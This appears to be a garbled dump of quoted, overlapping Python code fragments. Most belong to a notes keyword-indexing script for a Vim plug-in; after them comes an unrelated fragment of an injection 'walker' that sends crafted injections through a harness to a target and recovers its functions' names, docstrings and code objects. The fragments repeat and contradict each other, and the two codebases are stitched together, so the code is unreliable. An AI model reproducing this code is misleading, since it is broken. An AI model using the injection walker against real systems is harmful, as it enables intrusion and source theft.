class Timer:", "%s\", len(index['files']), load_timer) except Exception: logger.warning(\"Failed to load index from file!\", exc_info=True) return", "logger.debug(\"Loading index from %s ..\", index_location) with open(index_location, 'rb') as handle: index =", "file to index: %s\", filename) index['files'][filename] = last_modified with open(filename, encoding='utf-8') as handle:", "filename] self.dirty = True def search_index(self, keywords): \"\"\"Return names of files containing all", "= self.notes_directories index = self.index # First we find the filenames and last", "URL: http://peterodding.com/code/vim/notes/ # License: MIT # # This Python script can be used", "% self.elapsed_time @property def elapsed_time(self): return time.time() - self.start_time if __name__ == '__main__':", "index, filename, last_modified): \"\"\"Add a note to the index (assumes the note is", "is None: matches = submatches else: matches &= submatches return list(matches) if matches", "def add_note(self, filename, last_modified): \"\"\"Add a note to the index (assumes the note", "self.notes_directories index = self.index # First we find the filenames and last modified", "# For more information about the Vim plug-in see http://peterodding.com/code/vim/notes/. \"\"\" Usage: search_notes.py", "disk. notes_on_disk = {} last_count = 0 for directory in user_directories: for root,", "= ['~/.vim/misc/notes/user/'] self.character_encoding = 'UTF-8' self.case_sensitive = True self.keyword_filter = None # Map", "not None: decorated.append((Levenshtein.distance(normalized_kw, substring), -len(filenames), kw)) else: decorated.append((-len(filenames), kw)) decorated.sort() selection = [d[-1]", "# Filename matching patterns of files to ignore during scans. INCLUDE_PATTERNS = {'*.md',", "= set() text = self.decode(text) for word in re.findall(r'\\w+', text, re.UNICODE): word =", "in less than a second. # # The keyword index is a Python", "absolute.\"\"\" return os.path.abspath(os.path.expanduser(path)) def usage(self): print(__doc__.strip()) class Timer: \"\"\"Easy to use timer to", "a total of %i notes ..\", len(notes_on_disk)) # Check for updated and/or deleted", "self.keyword_filter = self.decode(self.keyword_filter) # Canonicalize pathnames, check validity. self.database_file = self.munge_path(self.database_file) self.user_directories =", "we can forget about it. del notes_on_disk[filename] # Add new notes to index.", "index in %s\", len(index['files']), load_timer) except Exception: logger.warning(\"Failed to load index from file!\",", "else keyword.lower() def encode(self, text): \"\"\"Encode a string in the user's preferred character", "# Python script for fast text file searching using keyword index on disk.", "deleted notes since the last run? if index: for filename in set(index['files'].keys()): if", "os import re import sys import time import pickle from typing import List,", "= True self.index = {'keywords': {}, 'files': {}, 'version': INDEX_VERSION} def save_index(self): \"\"\"Save", "save if necessary. self.save_index(INDEX_FILE_PATH, index) def add_note_to_index(self, index, filename, last_modified): \"\"\"Add a note", "# Return tokenized keyword arguments. return [self.normalize(k) for k in self.tokenize(' '.join(keywords))] def", "to disk.\"\"\" save_timer = Timer() with open(self.database_file, 'wb') as handle: pickle.dump(self.index, handle) logger.debug(\"Saved", "load_timer = Timer() logger.debug(\"Loading index from %s ..\", self.database_file) with open(self.database_file, 'rb') as", "from disk: %i\", self.index['version']) assert self.index['version'] == INDEX_VERSION, \"Incompatible index format detected!\" self.first_use", "is None: matches = submatches else: matches &= submatches return sorted(matches) if matches", "decode(self, text): \"\"\"Decode a string in the user's preferred character encoding.\"\"\" if isinstance(text,", "invocation of the program. Valid options include: -i, --ignore-case ignore case of keyword(s)", "elif opt in ('-n', '--notes'): self.user_directories.append(arg) elif opt in ('-e', '--encoding'): self.character_encoding =", "global_timer) else: matches = self.search_index(keywords) if matches: print('\\n'.join(sorted(matches))) logger.debug(\"Finished searching index in %s\",", "def save_index(self, database_file: str, index): \"\"\"Save the keyword index to disk.\"\"\" with open(database_file,", "# This Python script can be used by the notes.vim plug-in to perform", "very naive but it's quite # fast. Also the pickle protocol makes sure", "= {'keywords': {}, 'files': {}, 'version': INDEX_VERSION} def save_index(self): \"\"\"Save the keyword index", "in normalized_db_keywords: # Yes I'm using a nested for loop over all keywords", "don't slow searching down so much; # - Hundreds of notes can be", "index by scanning the notes directory.\"\"\" user_directories = self.notes_directories index = self.index #", "parse_args(self, argv): \"\"\"Parse the command line arguments.\"\"\" try: opts, keywords = getopt.getopt(argv, 'il:d:n:e:vh',", "operations.\"\"\" def __init__(self): self.start_time = time.time() def __str__(self): return \"%.2f seconds\" % self.elapsed_time", "Map command line options to variables. for opt, arg in opts: if opt", "in %s\", len(index['files']), load_timer) except Exception: logger.warning(\"Failed to load index from file!\", exc_info=True)", "set() text = self.decode(text) for word in re.findall(r'\\w+', text, re.UNICODE): word = word.strip()", "from %s ..\", self.database_file) with open(self.database_file, 'rb') as handle: self.index = pickle.load(handle) logger.debug(\"Format", "None: self.list_keywords(self.keyword_filter) logger.debug(\"Finished listing keywords in %s\", global_timer) else: matches = self.search_index(keywords) if", "save_timer = Timer() with open(self.database_file, 'wb') as handle: pickle.dump(self.index, handle) logger.debug(\"Saved index to", "needles = query.split() matches = None normalized_db_keywords = [(k, k.lower()) for k in", "if word != '' and not word.isspace() and len(word) >= 2: words.add(word) return", "user's notes: # # - Very large notes don't slow searching down so", "Timer() logger.debug(\"Loading index from %s ..\", index_location) with open(index_location, 'rb') as handle: index", "from file!\", exc_info=True) self.first_use = True self.dirty = True self.index = {'keywords': {},", "self.user_directories = [self.munge_path(d) for d in self.user_directories if os.path.isdir(d)] # Return tokenized keyword", "# efficient, but really it doesn't seem to be needed -- I have", "note to the index (assumes the note is not already indexed).\"\"\" logger.info(\"Adding file", "in ('-h', '--help'): self.usage() sys.exit(0) else: assert False, \"Unhandled option\" logger.debug(\"Index file: %s\",", "'ignore-case', 'list=', 'database=', 'notes=', 'encoding=', 'verbose', 'help', ]) except getopt.GetoptError as error: print(str(error))", "None: matches = submatches else: matches &= submatches return list(matches) if matches else", "to the notes search.\"\"\" global_timer = Timer() keywords = self.parse_args(argv or sys.argv[1:]) self.load_index()", "line option defaults. self.database_file = '~/.vim/misc/notes/index.pickle' self.user_directories = ['~/.vim/misc/notes/user/'] self.character_encoding = 'UTF-8' self.case_sensitive", "def save_index(self): \"\"\"Save the keyword index to disk.\"\"\" save_timer = Timer() with open(self.database_file,", "k in self.tokenize(' '.join(keywords))] def load_index(self): \"\"\"Load the keyword index or start with", "self.delete_note_from_index(index, filename) else: # Check whether previously seen note has changed? last_modified_on_disk =", "self.database_file) logger.debug(\"Notes directories: %r\", self.user_directories) logger.debug(\"Character encoding: %s\", self.character_encoding) if self.keyword_filter is not", "in notes_on_disk: # Forget a deleted note. self.delete_note(filename) else: # Check whether previously", "else: matches &= submatches return list(matches) if matches else [] def list_keywords(self, substring,", "in the user's preferred character encoding.\"\"\" if isinstance(text, str): text = codecs.encode(text, self.character_encoding,", "tokenize(self, text: str) -> Set[str]: \"\"\"Tokenize a string into a list of normalized,", "a string into a list of normalized, unique keywords.\"\"\" return {w.strip() for w", "= [os.path.expanduser('~/Dropbox/notes')] INDEX_FILE_PATH = os.path.expanduser('~/notes-index.pickle') logging.basicConfig(level=logging.DEBUG) logger = logging.getLogger(__name__) def load_index(index_location): try: load_timer", "user's preferred character encoding.\"\"\" if isinstance(text, bytes): text = codecs.decode(text, self.character_encoding, 'ignore') return", "from given index.\"\"\" logger.info(\"Deleting file from index: %s\", filename) del index['files'][filename] for kw", "loop over all keywords in the index. If # I really have to", "import getopt import logging import os import re import sys import time import", "else: self.index['keywords'][kw].append(filename) self.dirty = True def delete_note(self, filename): \"\"\"Remove a note from the", "dirs, files in os.walk(directory): for filename in files: if any(fnmatch.fnmatch(filename, pattern) for pattern", "None # The version of the index format that's supported by this revision", "of the dictionary may seem very naive but it's quite # fast. Also", "%s\", self.database_file) logger.debug(\"Notes directories: %r\", self.user_directories) logger.debug(\"Character encoding: %s\", self.character_encoding) if self.keyword_filter is", "\"\"\"Return names of files containing all of the given keywords.\"\"\" print('Searching index') index", "index to disk in %s\", save_timer) def update_index(self): \"\"\"Update the keyword index by", "'files': {}, 'version': INDEX_VERSION} def save_index(self): \"\"\"Save the keyword index to disk.\"\"\" save_timer", "line arguments.\"\"\" try: opts, keywords = getopt.getopt(argv, 'il:d:n:e:vh', [ 'ignore-case', 'list=', 'database=', 'notes=',", "Check whether previously seen note has changed? last_modified_on_disk = notes_on_disk[filename] last_modified_in_db = self.index['files'][filename]", "= [(k, self.normalize(k)) for k in self.index['keywords']] for usr_kw in keywords: submatches =", "global_timer = Timer() keywords = self.parse_args(argv or sys.argv[1:]) self.load_index() self.update_index() if self.dirty: self.save_index()", "len(notes_on_disk)) # Check for updated and/or deleted notes since the last run? if", "of the notes on disk. notes_on_disk = {} last_count = 0 for directory", "updated and/or deleted notes since the last run? if not self.first_use: for filename", "as handle: pickle.dump(self.index, handle) logger.debug(\"Saved index to disk in %s\", save_timer) def update_index(self):", "script can be used by the notes.vim plug-in to perform fast # keyword", "index loaded from disk: %i\", self.index['version']) assert self.index['version'] == INDEX_VERSION, \"Incompatible index format", "note. self.delete_note(filename) else: # Check whether previously seen note has changed? last_modified_on_disk =", "to variables. for opt, arg in opts: if opt in ('-i', '--ignore-case'): self.case_sensitive", "self.index['version']) assert self.index['version'] == INDEX_VERSION, \"Incompatible index format detected!\" self.first_use = False self.dirty", "def __str__(self): return \"%.2f seconds\" % self.elapsed_time @property def elapsed_time(self): return time.time() -", "def delete_note(self, filename): \"\"\"Remove a note from the index.\"\"\" logger.info(\"Removing file from index:", "all of the given keywords.\"\"\" matches = None normalized_db_keywords = [(k, self.normalize(k)) for", "that's supported by this revision of the # `search_notes.py' script; if an existing", "files in os.walk(directory): for filename in files: if any(fnmatch.fnmatch(filename, pattern) for pattern in", "run? if not self.first_use: for filename in self.index['files'].keys(): if filename not in notes_on_disk:", "user-defined path, making it absolute.\"\"\" return os.path.abspath(os.path.expanduser(path)) def usage(self): print(__doc__.strip()) class Timer: \"\"\"Easy", "\"\"\" # Standard library modules. import codecs import fnmatch import getopt import logging", "self.dirty = True def delete_note(self, filename): \"\"\"Remove a note from the index.\"\"\" logger.info(\"Removing", "search.\"\"\" global_timer = Timer() keywords = self.parse_args(argv or sys.argv[1:]) self.load_index() self.update_index() if self.dirty:", "keywords = self.parse_args(argv or sys.argv[1:]) self.load_index() self.update_index() if self.dirty: self.save_index() if self.keyword_filter is", "raw = handle.read() for kw in tokenize(raw): if kw not in index['keywords']: index['keywords'][kw]", "\"\"\"Parse the command line arguments.\"\"\" try: opts, keywords = getopt.getopt(argv, 'il:d:n:e:vh', [ 'ignore-case',", "[d[-1] for d in decorated[:limit]] print(selection) print(self.encode(u'\\n'.join(selection))) def tokenize(self, text): \"\"\"Tokenize a string", "-v, --verbose make more noise -h, --help show this message and exit For", "filename) self.add_note_to_index(index, filename, last_modified_on_disk) # Already checked this note, we can forget about", "normalized, unique keywords.\"\"\" words = set() text = self.decode(text) for word in re.findall(r'\\w+',", "= self.index # First we find the filenames and last modified times of", "a nested for loop over all keywords in the index. If # I", "= None # Map command line options to variables. for opt, arg in", "file -n, --notes=DIR set directory with user notes (can be repeated) -e, --encoding=NAME", "as handle: self.index = pickle.load(handle) logger.debug(\"Format version of index loaded from disk: %i\",", "<NAME> <<EMAIL>> # Last Change: November 1, 2015 # URL: http://peterodding.com/code/vim/notes/ # License:", "index from file!\", exc_info=True) self.first_use = True self.dirty = True self.index = {'keywords':", "# module. The structure of the dictionary may seem very naive but it's", "filename, last_modified in notes_on_disk.items(): self.add_note(filename, last_modified) logger.info(\"Updated index in %s\", update_timer) def add_note(self,", "of normalized, unique keywords.\"\"\" return {w.strip() for w in re.findall(r'\\w{3,}', text, re.UNICODE) if", "def decode(self, text): \"\"\"Decode a string in the user's preferred character encoding.\"\"\" if", "note. self.delete_note_from_index(index, filename) else: # Check whether previously seen note has changed? last_modified_on_disk", "%s\", filename) self.index['files'][filename] = last_modified with open(filename, encoding='utf-8') as handle: for kw in", "print(selection) print(self.encode(u'\\n'.join(selection))) def tokenize(self, text): \"\"\"Tokenize a string into a list of normalized,", "files to ignore during scans. INCLUDE_PATTERNS = {'*.md', '*.txt'} NOTES_DIRECTORIES = [os.path.expanduser('~/Dropbox/notes')] INDEX_FILE_PATH", "last_modified_on_disk) # Already checked this note, we can forget about it. del notes_on_disk[filename]", "to the index (assumes the note is not already indexed).\"\"\" logger.info(\"Adding file to", "disk. # # Author: <NAME> <<EMAIL>> # Last Change: November 1, 2015 #", "'ignore') return text def decode(self, text): \"\"\"Decode a string in the user's preferred", "..\", len(notes_on_disk)) # Check for updated and/or deleted notes since the last run?", "file: %s\", self.database_file) logger.debug(\"Notes directories: %r\", self.user_directories) logger.debug(\"Character encoding: %s\", self.character_encoding) if self.keyword_filter", "note is not already indexed).\"\"\" logger.info(\"Adding file to index: %s\", filename) index['files'][filename] =", "def usage(self): print(__doc__.strip()) class Timer: \"\"\"Easy to use timer to keep track of", "\"\"\"Easy to use timer to keep track of long during operations.\"\"\" def __init__(self):", "opts, keywords = getopt.getopt(argv, 'il:d:n:e:vh', [ 'ignore-case', 'list=', 'database=', 'notes=', 'encoding=', 'verbose', 'help',", "error: print(str(error)) self.usage() sys.exit(2) # Define the command line option defaults. self.database_file =", "Timer() keywords = self.parse_args(argv or sys.argv[1:]) self.load_index() self.update_index() if self.dirty: self.save_index() if self.keyword_filter", "self.keyword_filter is not None: self.list_keywords(self.keyword_filter) logger.debug(\"Finished listing keywords in %s\", global_timer) else: matches", "return [self.normalize(k) for k in self.tokenize(' '.join(keywords))] def load_index(self): \"\"\"Load the keyword index", "appear at first sight :-). # # For more information about the Vim", "standard output.\"\"\" print('listing keywords') decorated = [] substring = self.normalize(substring) for kw, filenames", "of %i notes ..\", len(notes_on_disk)) # Check for updated and/or deleted notes since", "normalized_db_keywords: # Yes I'm using a nested for loop over all keywords in", "string in the user's preferred character encoding.\"\"\" if isinstance(text, str): text = codecs.encode(text,", "self.normalize(kw) if substring in normalized_kw: if Levenshtein is not None: decorated.append((Levenshtein.distance(normalized_kw, substring), -len(filenames),", "the user's preferred character encoding.\"\"\" if isinstance(text, bytes): text = codecs.decode(text, self.character_encoding, 'ignore')", "except ImportError: Levenshtein = None # The version of the index format that's", "else: matches &= submatches return sorted(matches) if matches else [] def update_index(self): \"\"\"Update", "it should rebuild the index. INDEX_VERSION = 3 # Filename matching patterns of", "in self.index['keywords']: self.index['keywords'][kw] = [x for x in self.index['keywords'][kw] if x != filename]", "__init__(self, argv=None): \"\"\"Entry point to the notes search.\"\"\" global_timer = Timer() keywords =", "in %s\", global_timer) else: matches = self.search_index(keywords) if matches: print('\\n'.join(sorted(matches))) logger.debug(\"Finished searching index", "in self.user_directories if os.path.isdir(d)] # Return tokenized keyword arguments. return [self.normalize(k) for k", "set directory with user notes (can be repeated) -e, --encoding=NAME set character encoding", "del self.index['files'][filename] for kw in self.index['keywords']: self.index['keywords'][kw] = [x for x in self.index['keywords'][kw]", "to load index from file!\", exc_info=True) self.first_use = True self.dirty = True self.index", "This Python script can be used by the notes.vim plug-in to perform fast", "self.index['files'][filename] = last_modified with open(filename, encoding='utf-8') as handle: for kw in self.tokenize(handle.read()): if", "strings are stored only # once, so it's not as bad as it", "keywords.\"\"\" return {w.strip() for w in re.findall(r'\\w{3,}', text, re.UNICODE) if not w.isspace()} def", "preferred character encoding.\"\"\" if isinstance(text, bytes): text = codecs.decode(text, self.character_encoding, 'ignore') return text", "much; # - Hundreds of notes can be searched in less than a", "self.index['keywords']: self.index['keywords'][kw] = [x for x in self.index['keywords'][kw] if x != filename] self.dirty", "of the given keywords.\"\"\" matches = None normalized_db_keywords = [(k, self.normalize(k)) for k", "logger.debug(\"Disabling case sensitivity\") elif opt in ('-l', '--list'): self.keyword_filter = arg.strip().lower() elif opt", "# once, so it's not as bad as it may appear at first", "= True self.dirty = True self.index = {'keywords': {}, 'files': {}, 'version': INDEX_VERSION}", "= last_modified with open(filename, encoding='utf-8') as handle: for kw in self.tokenize(handle.read()): if kw", "submatches.update(self.index['keywords'][original_db_kw]) if matches is None: matches = submatches else: matches &= submatches return", "(assumes the note is not already indexed).\"\"\" logger.info(\"Adding file to index: %s\", filename)", "if self.case_sensitive else keyword.lower() def encode(self, text): \"\"\"Encode a string in the user's", "\"\"\"Tokenize a string into a list of normalized, unique keywords.\"\"\" return {w.strip() for", "user_directories = self.notes_directories index = self.index # First we find the filenames and", "last_modified in notes_on_disk.items(): self.add_note_to_index(index, filename, last_modified) # TODO: Only save if necessary. self.save_index(INDEX_FILE_PATH,", "INDEX_VERSION = 3 # Filename matching patterns of files to ignore during scans.", "False logger.debug(\"Disabling case sensitivity\") elif opt in ('-l', '--list'): self.keyword_filter = arg.strip().lower() elif", "# fast. Also the pickle protocol makes sure repeating strings are stored only", "containing all of the given keywords.\"\"\" print('Searching index') index = load_index(INDEX_FILE_PATH) needles =", "checked this note, we can forget about it. del notes_on_disk[filename] # Add new", "\"\"\"Decode a string in the user's preferred character encoding.\"\"\" if isinstance(text, bytes): text", "elif opt in ('-l', '--list'): self.keyword_filter = arg.strip().lower() elif opt in ('-d', '--database'):", "{}, 'files': {}, 'version': INDEX_VERSION} def save_index(self): \"\"\"Save the keyword index to disk.\"\"\"", "last_modified_in_db = index['files'][filename] if last_modified_on_disk > last_modified_in_db: self.delete_note_from_index(index, filename) self.add_note_to_index(index, filename, last_modified_on_disk) #", "if isinstance(text, str): text = codecs.encode(text, self.character_encoding, 'ignore') return text def decode(self, text):", "%s\", save_timer) def update_index(self): \"\"\"Update the keyword index by scanning the notes directory.\"\"\"", "def load_index(self): \"\"\"Load the keyword index or start with an empty one.\"\"\" try:", "(matching) keywords to standard output.\"\"\" print('listing keywords') decorated = [] substring = self.normalize(substring)", "\"\"\"Update the keyword index by scanning the notes directory.\"\"\" user_directories = self.notes_directories index", "= 3 # Filename matching patterns of files to ignore during scans. INCLUDE_PATTERNS", "The structure of the dictionary may seem very naive but it's quite #", "self.database_file = arg elif opt in ('-n', '--notes'): self.user_directories.append(arg) elif opt in ('-e',", "= index_location self.notes_directories = notes_directories self.index = load_index(self.index_location) def search(self, query: str) ->", "logger.info(\"Removing file from index: %s\", filename) del self.index['files'][filename] for kw in self.index['keywords']: self.index['keywords'][kw]", "self.index['keywords'].items(): normalized_kw = self.normalize(kw) if substring in normalized_kw: if Levenshtein is not None:", "False, \"Unhandled option\" logger.debug(\"Index file: %s\", self.database_file) logger.debug(\"Notes directories: %r\", self.user_directories) logger.debug(\"Character encoding:", "matching patterns of files to ignore during scans. INCLUDE_PATTERNS = {'*.md', '*.txt'} NOTES_DIRECTORIES", "--encoding=NAME set character encoding of notes -v, --verbose make more noise -h, --help", "notes to index. for filename, last_modified in notes_on_disk.items(): self.add_note(filename, last_modified) logger.info(\"Updated index in", "or more directories of plain text files using a full text index, updated", "codecs import fnmatch import getopt import logging import os import re import sys", "may appear at first sight :-). # # For more information about the", "sensitivity\") elif opt in ('-l', '--list'): self.keyword_filter = arg.strip().lower() elif opt in ('-d',", "else: return index class TextIndex: def __init__(self, index_location: str, notes_directories: List[str]): self.index_location =", "return index class TextIndex: def __init__(self, index_location: str, notes_directories: List[str]): self.index_location = index_location", "be repeated) -e, --encoding=NAME set character encoding of notes -v, --verbose make more", "= '~/.vim/misc/notes/index.pickle' self.user_directories = ['~/.vim/misc/notes/user/'] self.character_encoding = 'UTF-8' self.case_sensitive = True self.keyword_filter =", "timer to keep track of long during operations.\"\"\" def __init__(self): self.start_time = time.time()", "user_directories: for root, dirs, files in os.walk(directory): for filename in files: if any(fnmatch.fnmatch(filename,", "that's persisted using the pickle # module. The structure of the dictionary may", "= [self.munge_path(d) for d in self.user_directories if os.path.isdir(d)] # Return tokenized keyword arguments.", "True def delete_note(self, filename): \"\"\"Remove a note from the index.\"\"\" logger.info(\"Removing file from", "True self.index = {'keywords': {}, 'files': {}, 'version': INDEX_VERSION} def save_index(self): \"\"\"Save the", "long during operations.\"\"\" def __init__(self): self.start_time = time.time() def __str__(self): return \"%.2f seconds\"", "pickle.dump(index, handle) class NotesIndex: def __init__(self, argv=None): \"\"\"Entry point to the notes search.\"\"\"", "isinstance(text, bytes): text = codecs.decode(text, self.character_encoding, 'ignore') return text def munge_path(self, path): \"\"\"Canonicalize", "save_timer) def update_index(self): \"\"\"Update the keyword index by scanning the notes directory.\"\"\" update_timer", "path): \"\"\"Canonicalize user-defined path, making it absolute.\"\"\" return os.path.abspath(os.path.expanduser(path)) def usage(self): print(__doc__.strip()) class", "normalized_db_keywords = [(k, k.lower()) for k in index['keywords']] for word in needles: submatches", "directory in self.user_directories: print('Scanning', directory) for root, dirs, files in os.walk(directory): for filename", "existing index file is found with an # unsupported version, the script knows", "else [] def update_index(self): \"\"\"Update the keyword index by scanning the notes directory.\"\"\"", "('-n', '--notes'): self.user_directories.append(arg) elif opt in ('-e', '--encoding'): self.character_encoding = arg elif opt", "in notes_on_disk.items(): self.add_note(filename, last_modified) logger.info(\"Updated index in %s\", update_timer) def add_note(self, filename, last_modified):", "str): text = codecs.encode(text, self.character_encoding, 'ignore') return text def decode(self, text): \"\"\"Decode a", "= load_index(INDEX_FILE_PATH) needles = query.split() matches = None normalized_db_keywords = [(k, k.lower()) for", "ImportError: Levenshtein = None # The version of the index format that's supported", "load_index(index_location): try: load_timer = Timer() logger.debug(\"Loading index from %s ..\", index_location) with open(index_location,", "import time import pickle from typing import List, Set try: import Levenshtein except", "x != filename] self.dirty = True def search_index(self, keywords): \"\"\"Return names of files", "load_timer) except Exception: logger.warn(\"Failed to load index from file!\", exc_info=True) self.first_use = True", "to I'll probably come up with something more # efficient, but really it", "self.munge_path(self.database_file) self.user_directories = [self.munge_path(d) for d in self.user_directories if os.path.isdir(d)] # Return tokenized", "keywords.\"\"\" print('Searching index') index = load_index(INDEX_FILE_PATH) needles = query.split() matches = None normalized_db_keywords", "words.add(word) return words def normalize(self, keyword): \"\"\"Normalize the case of a keyword if", "d in decorated[:limit]] print(selection) print(self.encode(u'\\n'.join(selection))) def tokenize(self, text): \"\"\"Tokenize a string into a", "codecs.encode(text, self.character_encoding, 'ignore') return text def decode(self, text): \"\"\"Decode a string in the", "pickle.load(handle) logger.debug(\"Format version of index loaded from disk: %i\", index['version']) assert index['version'] ==", "logger.debug(\"Format version of index loaded from disk: %i\", self.index['version']) assert self.index['version'] == INDEX_VERSION,", "Timer() # First we find the filenames and last modified times of the", "dictionary that's persisted using the pickle # module. The structure of the dictionary", "index class TextIndex: def __init__(self, index_location: str, notes_directories: List[str]): self.index_location = index_location self.notes_directories", "case sensitivity\") elif opt in ('-l', '--list'): self.keyword_filter = arg.strip().lower() elif opt in", "= True def search_index(self, keywords): \"\"\"Return names of files containing all of the", "given keywords.\"\"\" matches = None normalized_db_keywords = [(k, self.normalize(k)) for k in self.index['keywords']]", "index.\"\"\" logger.info(\"Deleting file from index: %s\", filename) del index['files'][filename] for kw in index['keywords']:", "INDEX_VERSION, \"Incompatible index format detected!\" self.first_use = False self.dirty = False logger.debug(\"Loaded %i", "Check whether previously seen note has changed? last_modified_on_disk = notes_on_disk[filename] last_modified_in_db = index['files'][filename]", "keyword index to disk.\"\"\" with open(database_file, 'wb') as handle: pickle.dump(index, handle) class NotesIndex:", "in index['keywords']: index['keywords'][kw] = [filename] else: index['keywords'][kw].append(filename) def delete_note_from_index(self, index, filename): \"\"\"Delete a", "= None # The version of the index format that's supported by this", "License: MIT # # This Python script can be used by the notes.vim", "the notes on disk. notes_on_disk = {} last_count = 0 for directory in" ]
[ "walker @staticmethod def code_obj_to_signature( code_obj: CodeType ) -> str: \"\"\"Get a function signature", "recover this function's __name__.\"\"\" return self._name_walker @property def docstring_walker( self ) -> DocStringInjectionWalker:", "None: yield FailedInjectionWalker.msg( 'Unable to read __doc__ of function via injection ' f'{doc_string_injection}')", "sending {doc_string_injection} ' f'but got {walker.__class__.__qualname__} instead') return yield from walker.walk() self._docstring_walker =", "argument names could not be reversed for below signature def {code_obj.co_name}(*args, **kwargs):\"\"\" def", "walker for a function. This module will attempt to recover the source code", "for below signature def {code_obj.co_name}(*args, **kwargs):\"\"\" def __str__( self ) -> str: return", "\"\"\" INJECTION_RE = None RESPONSE_RE = r'<function .+ at 0x[0-9a-fA-F]+>' def __extra_init__( self", "self._src_code += f' \"\"\"{self._docstring_walker.value}\"\"\"\\n' self._src_code += '\\n'.join(indented_src_lines) yield self def _walk_name( self )", "f'{self._injection_str}.__code__' raw_result = self._harness.send_injection(code_obj_injection) if raw_result is None: yield FailedInjectionWalker.msg( 'Unable to recover", "-> Optional[str]: \"\"\"The decompiled function's signature, if one was retrieved.\"\"\" return self._signature def", "f'{raw_result}') return elif not isinstance(walker, CodeObjectInjectionWalker): yield FailedInjectionWalker.msg( f'Got {type(walker)} when injecting function", "= ([] if walker.src_code is None else walker.src_code.splitlines()) indented_src_lines = [f' {line}' for", "return self._signature def walk( self ) -> Iterator[AbstractInjectionWalker]: yield from self._walk_name() if not", "= self._harness.send_injection(doc_string_injection) if result is None: yield FailedInjectionWalker.msg( 'Unable to read __doc__ of", "{walker.__class__.__qualname__} instead') return yield from walker.walk() self._docstring_walker = walker @staticmethod def code_obj_to_signature( code_obj:", "RESPONSE_RE = r'<function .+ at 0x[0-9a-fA-F]+>' def __extra_init__( self ) -> None: self._code_walker:", "walker.code_obj is None or walker.src_code is None: yield FailedInjectionWalker.msg( 'Unable to successfully recover", "If the call to ``walk()`` cannot recover the object, then this attribute will", "walker recovered from the target. This attribute will only be populated after a", "return self._code_walker @property def name_walker( self ) -> NameInjectionWalker: \"\"\"Walker used to recover", "a function signature from a code object. See: https://stackoverflow.com/a/56761306/5094008 \"\"\" try: func =", "is None: yield FailedInjectionWalker.msg( 'Unable to read __doc__ of function via injection '", "walker.src_code.splitlines()) indented_src_lines = [f' {line}' for line in src_lines] self._signature = self.__class__.code_obj_to_signature( walker.code_obj)", "isinstance(walker, CodeObjectInjectionWalker): yield FailedInjectionWalker.msg( f'Got {type(walker)} when injecting function __code__ ' 'attribute; something", "FailedInjectionWalker.msg( f'Expected a name walker when sending {name_injection} ' f'but got {walker.__class__.__qualname__} instead')", "be reversed for below signature def {code_obj.co_name}(*args, **kwargs):\"\"\" def __str__( self ) ->", "self.next_walker(name_injection, result) if not isinstance(walker, NameInjectionWalker): yield FailedInjectionWalker.msg( f'Expected a name walker when", "cannot recover the object, then this attribute will remain as ``None``. \"\"\" return", "def walk( self ) -> Iterator[AbstractInjectionWalker]: yield from self._walk_name() if not self._name_walker.is_default: if", "f'but got {walker.__class__.__qualname__} instead') return yield from walker.walk() self._docstring_walker = walker @staticmethod def", "self._walk_name() if not self._name_walker.is_default: if self._name_walker.value in self._engine.function_blacklist: return self._engine.function_blacklist.add(self._name_walker.value) yield from self._walk_docstring()", "signature( self ) -> Optional[str]: \"\"\"The decompiled function's signature, if one was retrieved.\"\"\"", "instead') return yield from walker.walk() self._docstring_walker = walker @staticmethod def code_obj_to_signature( code_obj: CodeType", "self ) -> Iterator[AbstractInjectionWalker]: yield from self._walk_name() if not self._name_walker.is_default: if self._name_walker.value in", "TypeError: # build our own signature return f\"\"\"\\ # exact argument names could", "return walker = self.next_walker(code_obj_injection, raw_result) if walker is None: yield FailedInjectionWalker.msg( 'No matching", "if self._name_walker.value in self._engine.function_blacklist: return self._engine.function_blacklist.add(self._name_walker.value) yield from self._walk_docstring() code_obj_injection = f'{self._injection_str}.__code__' raw_result", "as ``None``. \"\"\" return self._code_walker @property def name_walker( self ) -> NameInjectionWalker: \"\"\"Walker", "function signature from a code object. See: https://stackoverflow.com/a/56761306/5094008 \"\"\" try: func = FunctionType(code_obj,", "something is terribly wrong...') return for sub_walker in walker.walk(): yield sub_walker if walker.code_obj", "not self._name_walker.is_default: if self._name_walker.value in self._engine.function_blacklist: return self._engine.function_blacklist.add(self._name_walker.value) yield from self._walk_docstring() code_obj_injection =", ") -> Optional[CodeObjectInjectionWalker]: \"\"\"The code object that this walker recovered from the target.", "Optional[str]: \"\"\"The decompiled function's signature, if one was retrieved.\"\"\" return self._signature def walk(", "injection response ' f'{raw_result}') return elif not isinstance(walker, CodeObjectInjectionWalker): yield FailedInjectionWalker.msg( f'Got {type(walker)}", "# build our own signature return f\"\"\"\\ # exact argument names could not", "its ``__code__`` attribute. \"\"\" INJECTION_RE = None RESPONSE_RE = r'<function .+ at 0x[0-9a-fA-F]+>'", "None else walker.src_code.splitlines()) indented_src_lines = [f' {line}' for line in src_lines] self._signature =", "f'Got {type(walker)} when injecting function __code__ ' 'attribute; something is terribly wrong...') return", "target.\"\"\" return self._src_code @property def signature( self ) -> Optional[str]: \"\"\"The decompiled function's", "code object. See: https://stackoverflow.com/a/56761306/5094008 \"\"\" try: func = FunctionType(code_obj, {}) arg_sequence = inspect_signature(func)", "import ( DocStringInjectionWalker) from .failed_injection_walker import ( FailedInjectionWalker) from .name_injection_walker import ( NameInjectionWalker)", "DocStringInjectionWalker): yield FailedInjectionWalker.msg( f'Expected a doc walker when sending {doc_string_injection} ' f'but got", "found for injection response ' f'{raw_result}') return elif not isinstance(walker, CodeObjectInjectionWalker): yield FailedInjectionWalker.msg(", "self.empty_instance(NameInjectionWalker) self._docstring_walker: DocStringInjectionWalker = \\ self.empty_instance(DocStringInjectionWalker) self._src_code: Optional[str] = None self._signature: Optional[str] =", "import ( Iterator, Optional) from .abstract_injection_walker import ( AbstractInjectionWalker) from .code_object_injection_walker import (", "recover the source code from a function, via access to its ``__code__`` attribute.", "name_walker( self ) -> NameInjectionWalker: \"\"\"Walker used to recover this function's __name__.\"\"\" return", "recover injection response from string ' f'{raw_result}') return walker = self.next_walker(code_obj_injection, raw_result) if", "{}) arg_sequence = inspect_signature(func) return f'def {code_obj.co_name}{arg_sequence}:' except TypeError: # build our own", "from walker.walk() self._name_walker = walker def _walk_docstring( self ) -> Iterator[AbstractInjectionWalker]: \"\"\"Recover the", "retrieved.\"\"\" return self._signature def walk( self ) -> Iterator[AbstractInjectionWalker]: yield from self._walk_name() if", "of function via injection ' f'{doc_string_injection}') return walker = self.next_walker(doc_string_injection, result) if not", "src_lines = ([] if walker.src_code is None else walker.src_code.splitlines()) indented_src_lines = 